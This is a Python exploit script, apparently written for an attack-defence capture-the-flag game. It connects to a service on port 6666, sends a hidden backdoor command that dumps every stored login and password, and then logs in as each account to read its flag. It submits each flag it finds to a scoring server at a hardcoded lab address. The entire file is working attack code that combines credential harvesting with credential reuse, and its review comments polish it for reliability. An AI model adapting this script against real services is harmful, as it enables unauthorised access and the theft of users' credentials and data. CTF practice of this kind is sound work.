Quadratically exploit
#!/usr/bin/env python3
import socket, sys, re
from time import sleep
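# Target host is the first CLI argument; the vulnerable service listens on TCP 6666.
# Fail with a usage line instead of an IndexError when the argument is missing.
if len(sys.argv) < 2:
    sys.exit('usage: %s <target-ip>' % sys.argv[0])
s = socket.socket()
s.connect((sys.argv[1], 6666))  # first connection: used only to dump the credential list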
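def recv_until(s, st):
    """Read from socket *s* until the text *st* has been received.

    Args:
        s: a connected stream socket.
        st: marker to wait for (typically a prompt such as the service's '> ').

    Returns:
        Everything received so far, decoded as UTF-8, marker included.

    Raises:
        EOFError: the peer closed the connection before *st* arrived. The
            original loop spun forever on the empty recv() in that case.
        UnicodeDecodeError: the accumulated data is not valid UTF-8.
    """
    marker = st.encode()
    buf = b''
    # Accumulate raw bytes and decode once at the end, so a multi-byte UTF-8
    # sequence split across two recv() calls cannot raise mid-stream.
    while marker not in buf:
        chunk = s.recv(100500)
        if not chunk:
            raise EOFError('connection closed before %r was received' % st)
        buf += chunk
    return buf.decode()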
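# Log in with a throwaway name, trigger the backdoor command and collect the
# credential dump it returns. The listing arrives in plaintext over the wire.
try:
    recv_until(s, 'Enter your name:')
    s.sendall(b'asd\n')  # any name is accepted at the login prompt
    recv_until(s, '\n> ')
    s.sendall(b'zakladka\n')  # hidden command in the service that dumps all credentials
    # Response body is 'login1:password1\nlogin2:password2\n...' followed by the prompt.
    listing = recv_until(s, '\n> ')
finally:
    s.close()
# Keep only well-formed 'login:password' lines. The raw dump also contains the
# echoed prompt and blank lines; each of those would otherwise cost a full
# connection to the service before failing on the missing ':'.
creds = [line for line in listing.split('\n') if ':' in line]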
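JURY_ADDR = ('192.168.0.185', 31337)  # flag-submission server; lab address hardcoded for the game network
FLAG_RE = re.compile(r'(\w{31}=)')  # flag format: 31 word characters followed by '='
# Per-connection timeout so one hung service instance does not stall the whole
# run; a timeout is caught below and just skips the account. Tune to the round length.
SOCK_TIMEOUT = 10

for cred in creds:
    s2 = jury = None
    try:
        # Split on the first ':' only, so a password containing ':' is kept intact.
        login, password = cred.split(':', 1)
        login = login.strip()
        password = password.strip()
        s2 = socket.socket()
        s2.settimeout(SOCK_TIMEOUT)
        s2.connect((sys.argv[1], 6666))
        recv_until(s2, 'Enter your name:')
        s2.sendall(login.encode() + b'\n')
        # NOTE(review): a fixed delay plus a single recv() is racy on a slow
        # link; the exact prompt that follows a valid login is not known here,
        # so the original wait is kept.
        sleep(0.5)
        asd = s2.recv(100500).decode()
        if 'access to the premium functions' in asd:
            print('not valid')  # account has no flag
            continue
        s2.sendall(password.encode() + b'\n')
        recv_until(s2, '\n> ')
        s2.sendall(b'see\n')  # command that displays the flag
        flag = recv_until(s2, '\n> ')
        match = FLAG_RE.search(flag)
        if match is None:
            print('no flag found for %s' % login)
            continue
        jury = socket.socket()
        jury.settimeout(SOCK_TIMEOUT)
        jury.connect(JURY_ADDR)
        recv_until(jury, '\n')  # jury greeting line
        jury.sendall(match.group(1).encode() + b'\n')
        print(jury.recv(100500).decode())  # jury verdict for this flag
    except KeyboardInterrupt:
        # The original named a non-existent 'KeyboardError', which turned every
        # exception in the loop into a NameError that escaped the bare except.
        break
    except Exception as exc:
        # Best-effort: report and move on to the next account instead of
        # swallowing the error silently.
        print('skipping %r: %s' % (cred, exc))
        continue
    finally:
        # Close both sockets on every path; the original leaked them on error.
        for sock in (s2, jury):
            if sock is not None:
                sock.close()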